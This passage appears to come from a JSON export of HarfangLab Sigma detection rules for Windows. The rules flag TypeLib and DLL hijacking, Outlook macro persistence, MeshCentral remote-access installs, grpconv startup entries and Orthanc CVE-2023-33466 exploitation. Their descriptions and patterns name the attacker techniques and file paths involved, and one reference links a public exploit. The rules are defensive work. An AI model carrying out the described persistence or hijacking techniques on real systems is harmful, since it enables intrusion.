"content": "title: TypeLib Hijacking via Registry\nid: 81ff4aaf-a9b8-4e55-8636-5ebde7e57ac6\ndescription: |\n Detects the registration of a new type library in the Windows registry.\n Type libraries are files that include information about types and objects exposed by an ActiveX (COM) application.\n Adversaries may register a new type library in order to establish persistence. This library will be executed when a specified process is launched.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2024/10/25\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|contains:\n - 'TypeLib\\{????????-????-????-????-????????????}\\\\*\\\\*\\WIN64\\'\n - 'TypeLib\\{????????-????-????-????-????????????}\\\\*\\\\*\\WIN32\\'\n Details|startswith: 'script:'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81ff4aaf-a9b8-4e55-8636-5ebde7e57ac6",
"rule_name": "TypeLib Hijacking via Registry",
"rule_description": "Detects the registration of a new type library in the Windows registry.\nType libraries are files that include information about types and objects exposed by an ActiveX (COM) application.\nAdversaries may register a new type library in order to establish persistence. This library will be executed when a specified process is launched.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2024-10-25",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82582694-2dc2-45e5-8e0c-be9a6740f79d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586469Z",
"creation_date": "2026-03-23T11:45:34.586473Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586481Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://asec.ahnlab.com/en/64106/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_notepadpp.yml",
"content": "title: DLL Hijacking via notepad++.exe\nid: 82582694-2dc2-45e5-8e0c-be9a6740f79d\ndescription: |\n Detects potential Windows DLL Hijacking via notepad++.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nreferences:\n - https://asec.ahnlab.com/en/64106/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/05/02\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'notepad++.exe'\n ProcessSignature: 'Notepad++'\n ImageLoaded|endswith: '\\mimeTools.dll'\n sha256|contains: '?'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Notepad++\\'\n - '?:\\Program Files\\Notepad++\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Notepad++\\'\n - '?:\\Program Files\\Notepad++\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Notepad++'\n filter_imageloaded_peinfo:\n OriginalFileName: 'base64.dll'\n Product: 'mimeTools'\n Description: 'Base64 encoder/decoder plugin for Notepad++'\n Company: 'Don HO don.h@free.fr'\n\n exclusion_known_sha256:\n # https://www.virustotal.com/gui/file/8397fcc9a83e2a009075074adc99db529cebd9d0a3fbc97cee264cb8db3a2564\n # https://github.com/npp-plugins/mimetools/releases\n sha256:\n - 
'8397fcc9a83e2a009075074adc99db529cebd9d0a3fbc97cee264cb8db3a2564' # version 1.9\n - '58868d7751e27881e5c2ceaede90ea26f2d093934788f7816305374fa8abc008' # version 2.0\n - '102519fc95a83fa0a0947a867b5f7706622174753dadb2a095c913ab2f6d0a60' # version 2.0 x64\n - '4195f522700ac3275b4ce6a19c1c06e3d1d438d0cd70037f86ce5c3812ffa70f' # version 2.1\n - '6ccfdef2c0f192a75f3cb90b744c7c38d3e2b08fd47e14f3d8b3d48f4a4e06de' # version 2.1 x64\n - '4b4c29d702ba40a1ff9e28a595325e03d7ca46a1f77caa035e22dd5ba1ade390' # version 2.2\n - '1d179a9f442865badeb7aba17abe15eca502372e39256a185be5fc7eb60a587a' # version 2.2 x64\n - '6308a6b58cc8750b2b4a430ada87952bf76fd029bf1efa5ae343a908775a2bd9' # version 2.3\n - '69447ccea6e9c4536ea7b1635212536d5b18a22b9aab177053e11a8fdfd6e918' # version 2.3 x64\n - '7713ab3268b0314bea3c6f203e1b8ab9faf1be24cc97b24fe9d1b79ec095dbb0' # version 2.4\n - 'b082e2614a75da2c395c5b85a09f9c331a6d2aaaae2d92e43e62478bae25b5a6' # version 2.4 x64\n - 'baaa72bf24911a5f14511d1b2ce31800b7288d575d4ae5c92cfb0b4b5cc73f98' # version 2.5\n - '4e5c3bf3212501b906355268043f34ff229d98b690ddedf07f2b298f875cf2f9' # version 2.5 x64\n - '8c47897872413b4adcd1ae59684e4bd60cf7a1db1c17ddf8111d80fdf52ca8eb' # version 2.6\n - '0875329e6d192e3115d773112f681bc0819274d1cbb80e38cd788e793cc38a90' # version 2.6 x64\n - '7c0ef37ad83ccadcb32e7ff86e3ee9d6a3f180d9166060fd9ec58dad194aa7a3' # version 2.7\n - '8d15d5dc4857858564cad0379bfde9044c93af249d497009b8667d8d6bfc0968' # version 2.7 x64\n - 'a89b66c32ce4b977cc3744e76186fddd16992414c825ea2f1166a1ae544d69da' # version 2.8\n - 'b9a8ca258aa3edca1aa1b3ea4e264d3b0cda7c82a30b7464586d8be95701ea61' # version 2.8 x64\n - '9fe58b3ec6710340627278f0022f27f940f93c71df769af5ad0dc2989aa2a277' # version 2.9\n - 'b034d12b7624b038b5d87d9f965d7dfb9c18a5c6eb82b7f44caa16749c4e00cc' # version 2.9 x64\n - 'f244bf96bcef25a9a941160e3cc97a83fcf37a568b2b71b43f0ae6f0c4122fe6' # version 3.0\n - '0886272a0acb394a380cdd8dbe965813501a626daa94b237419ad395609304b7' # version 3.0 x64\n - 
'00c14753d6ef8942edfe55c10b22749422151b42a78afec31fac200e91f3e447' # version 3.1\n - '4698005effd3dbe9acbda48538e5b00ae151923805c347768f748bf57a72f197' # version 3.1 x64\n - '713bc3a04165e66620aad6ea78c65a7fa7aeae9e400444d635a1e38859030c8c' # version 3.1 x64\n - '120fd0c27fb6e4528dd8ba61c10ec70b85e1cbe867762bdcaa1bb52b14fcf577' # version 3.1 x64\n - '3ec2935bbfed1b1401a58046c84d98dcb0360382d312c30812efc8a459b8f845' # version 3.1 x64\n - 'f30c60e22cf5343b28b111b1c4310f869ff38515024147fc7eaaab53659f96f1' # version 3.1 x64\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82582694-2dc2-45e5-8e0c-be9a6740f79d",
"rule_name": "DLL Hijacking via notepad++.exe",
"rule_description": "Detects potential Windows DLL Hijacking via notepad++.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n",
"rule_creation_date": "2024-05-02",
"rule_modified_date": "2025-09-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8297e246-5ae5-4dd3-a3c6-35e3ba315bad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621589Z",
"creation_date": "2026-03-23T11:45:34.621591Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621596Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1137_outlook_startup.yml",
"content": "title: Microsoft Outlook Startup Macro Created\nid: 8297e246-5ae5-4dd3-a3c6-35e3ba315bad\ndescription: |\n Detects an attempt to create VbaProject.OTM in Outlook user directory.\n Attackers can create startup VBA macros to achieve persistence at Outlook boot.\n It is recommended to analyze the process reponsible for the creation of the macro file as well as to analyze the file itself to look for malicious content or actions.\nreferences:\n - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_workspace_managers:\n - ProcessImage:\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files\\citrix\\user profile manager\\userprofilemanager.exe'\n - '?:\\Program Files (x86)\\citrix\\user profile manager\\userprofilemanager.exe'\n # https://www.fichorga.fr/nos-solutions.php\n - 
ProcessOriginalFileName: 'Inst_authentic_ui.exe'\n # svchost user environment manager\n - ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s SessionEnv'\n\n exclusion_outlook:\n ProcessOriginalFileName: 'Outlook.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8297e246-5ae5-4dd3-a3c6-35e3ba315bad",
"rule_name": "Microsoft Outlook Startup Macro Created",
"rule_description": "Detects an attempt to create VbaProject.OTM in Outlook user directory.\nAttackers can create startup VBA macros to achieve persistence at Outlook boot.\nIt is recommended to analyze the process responsible for the creation of the macro file as well as to analyze the file itself to look for malicious content or actions.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82a30c48-7129-43eb-8568-c9a59ff30028",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076307Z",
"creation_date": "2026-03-23T11:45:34.076309Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076313Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://meshcentral.com/info/",
"https://twitter.com/malmoeb/status/1558861977379868672",
"https://attack.mitre.org/techniques/T1569/002/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1543_003_meshcentral_service_installed.yml",
"content": "title: MeshCentral Service Installed\nid: 82a30c48-7129-43eb-8568-c9a59ff30028\ndescription: |\n Detects the installation of a MeshCentral service.\n MeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\n It is recommended to remove unauthorized instances while reviewing historical network connections from the service endpoints.\nreferences:\n - https://meshcentral.com/info/\n - https://twitter.com/malmoeb/status/1558861977379868672\n - https://attack.mitre.org/techniques/T1569/002/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/08/23\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1569.002\n - attack.command_and_control\n - attack.t1543.003\n - classification.Windows.Source.EventLog\n - classification.Windows.RMM.MeshCentral\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 7045\n ServiceName|contains: 'Mesh Agent'\n\n condition: selection\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82a30c48-7129-43eb-8568-c9a59ff30028",
"rule_name": "MeshCentral Service Installed",
"rule_description": "Detects the installation of a MeshCentral service.\nMeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\nIt is recommended to remove unauthorized instances while reviewing historical network connections from the service endpoints.\n",
"rule_creation_date": "2022-08-23",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82ba06fb-1211-48c3-b5e3-be2baf17ac1c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088757Z",
"creation_date": "2026-03-23T11:45:34.088760Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088764Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1526833181831200770",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_suspicious_persistence_grpconv.yml",
"content": "title: Persistence Added via grpconv.exe\nid: 82ba06fb-1211-48c3-b5e3-be2baf17ac1c\ndescription: |\n Detects an entry in the startup folder being created via grpconv.exe.\n Attackers can add an entry in the startup folder to achieve persistence.\n It is recommended to investigate the file created for suspicious content and to analyze the process responsible for the execution of grpconv.exe.\nreferences:\n - https://twitter.com/0gtweet/status/1526833181831200770\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2022/05/19\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.LOLBin.Grpconv\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\grpconv.exe'\n TargetFilename|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' # individual user : c:\\users\\xxx\\appdata\\...\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\' # all users\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82ba06fb-1211-48c3-b5e3-be2baf17ac1c",
"rule_name": "Persistence Added via grpconv.exe",
"rule_description": "Detects an entry in the startup folder being created via grpconv.exe.\nAttackers can add an entry in the startup folder to achieve persistence.\nIt is recommended to investigate the file created for suspicious content and to analyze the process responsible for the execution of grpconv.exe.\n",
"rule_creation_date": "2022-05-19",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82bd1902-b17c-49f2-aff6-7b91e1340aa1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071691Z",
"creation_date": "2026-03-23T11:45:34.071693Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071698Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_prepare_persistence_dll_hijack_ikeext_wlbsctrl.yml",
"content": "title: IKEEXT Service DLL Hijack Prepared\nid: 82bd1902-b17c-49f2-aff6-7b91e1340aa1\ndescription: |\n Detects the creation of \"C:\\Windows\\System32\\wlbsctrl.dll\".\n This DLL is not normally present on the system at this path, but the IKEEXT service tries to load it at startup.\n Attackers can place a malicious payload at this path, gaining execution each time the IKEEXT is started.\n It is recommended to investigate the content of file being written, as well as potential manual restart of the IKEEXT service to determine if this action was legitimate.\nreferences:\n - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2020/10/02\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Windows\\System32\\wlbsctrl.dll'\n\n exclusion_tiworker_svchost:\n # C:\\Windows\\WinSxS\\Temp\\InFlight\\8e744265c6e9d6012163000028443044\\x86_microsoft-windows-t..-tsappsrv-component_31bf3856ad364e35_10.0.18362.1_none_e51344e8b75a8450\\TSVIPSrv.dll\n Path|contains:\n - '?:\\Windows\\WinSxS\\Temp\\InFlight'\n - '?:\\windows\\servicing\\LCU'\n - '?:\\windows\\softwaredistribution'\n\n exclusion_windowskits:\n Image: '?:\\Program Files (x86)\\Windows Kits\\10\\Assessment and Deployment Kit\\Deployment Tools\\WSIM\\imagecat.exe'\n Path|contains: '\\Windows\\WinSxS\\'\n\n exclusion_dism:\n Image: '?:\\Windows\\System32\\Dism.exe'\n Path|contains: '\\Windows\\WinSxS\\amd64_microsoft-windows' # 
C:\\Mount\\Windows\\WinSxS\\amd64_microsoft-windows-n..kloadbalancing-core_31bf3856ad364e35_10.0.17763.1_none_053da3b4296868b3\\wlbsctrl.dll\n\n exclusion_engine:\n Image:\n - '?:\\Windows\\System32\\wbengine.exe'\n - '?:\\Program Files\\Microsoft Azure Recovery Services Agent\\bin\\cbengine.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Path|contains: '\\Windows\\WinSxS\\amd64_microsoft-windows-n..kloadbalancing-core_' # C:\\Mount\\Windows\\WinSxS\\amd64_microsoft-windows-n..kloadbalancing-core_31bf3856ad364e35_10.0.17763.1_none_053da3b4296868b3\\wlbsctrl.dll\n\n exclusion_setup_host:\n # C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe\n # commandline: C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe /Install /Media /InstallFile D:\\Sources\\Install.wim /MediaPath D:\n Image: '*\\Sources\\SetupHost.exe'\n # C:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\amd64_microsoft-windows-n..kloadbalancing-core_31bf3856ad364e35_10.0.17763.1_none_053da3b4296868b3\\wlbsctrl.dll\n Path: '?:\\\\?WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\\\*'\n\n exclusion_docker:\n Image: '?:\\Program Files\\Docker\\Docker\\resources\\dockerd.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82bd1902-b17c-49f2-aff6-7b91e1340aa1",
"rule_name": "IKEEXT Service DLL Hijack Prepared",
"rule_description": "Detects the creation of \"C:\\Windows\\System32\\wlbsctrl.dll\".\nThis DLL is not normally present on the system at this path, but the IKEEXT service tries to load it at startup.\nAttackers can place a malicious payload at this path, gaining execution each time the IKEEXT is started.\nIt is recommended to investigate the content of file being written, as well as potential manual restart of the IKEEXT service to determine if this action was legitimate.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82cb5331-4e26-4950-ac2b-847847cb226b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079439Z",
"creation_date": "2026-03-23T11:45:34.079441Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079445Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2023-33466",
"https://www.shielder.com/blog/2023/10/cve-2023-33466-exploiting-healthcare-servers-with-polyglot-files/",
"https://github.com/ShielderSec/poc/blob/main/CVE-2023-33466/exploit.py",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_orthanc_rce_exploitation.yml",
"content": "title: Process Spawned by Orthanc Server\nid: 82cb5331-4e26-4950-ac2b-847847cb226b\ndescription: |\n Detects the execution of a process by the Orthanc server process.\n Orthanc is an open-source DICOM (Digital Imaging and Communications in Medicine) server used to centralise and visualise medical data.\n This can be the result of the exploitation of the CVE-2023-33466 vulnerability that allows a user to overwrite arbitrary files on the system.\n Attackers can exploit this vulnerability to overwrite Orthanc's config to allow remote LUA script to be executed, resulting in a privileged remote code execution primitive.\nreferences:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-33466\n - https://www.shielder.com/blog/2023/10/cve-2023-33466-exploiting-healthcare-servers-with-polyglot-files/\n - https://github.com/ShielderSec/poc/blob/main/CVE-2023-33466/exploit.py\n - https://attack.mitre.org/techniques/T1190/\ndate: 2023/10/24\nmodified: 2025/04/18\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-33466\n - classification.Windows.Exploit.Orthanc\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\Orthanc.exe'\n\n exclusion_conhost:\n OriginalFileName: 'conhost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_werfault:\n OriginalFileName: 'werfault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_orthanc:\n Image:\n - '?:\\Program Files\\Orthanc Server\\Orthanc.exe'\n - '?:\\Program Files (x86)\\icobridge-?.?\\Orthanc.exe'\n - '?:\\Program Files\\icobridge-?.?\\Orthanc.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82cb5331-4e26-4950-ac2b-847847cb226b",
"rule_name": "Process Spawned by Orthanc Server",
"rule_description": "Detects the execution of a process by the Orthanc server process.\nOrthanc is an open-source DICOM (Digital Imaging and Communications in Medicine) server used to centralise and visualise medical data.\nThis can be the result of the exploitation of the CVE-2023-33466 vulnerability that allows a user to overwrite arbitrary files on the system.\nAttackers can exploit this vulnerability to overwrite Orthanc's config to allow remote LUA script to be executed, resulting in a privileged remote code execution primitive.\n",
"rule_creation_date": "2023-10-24",
"rule_modified_date": "2025-04-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82d46a9a-ed34-43b5-b6b3-c0e066ee8b96",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
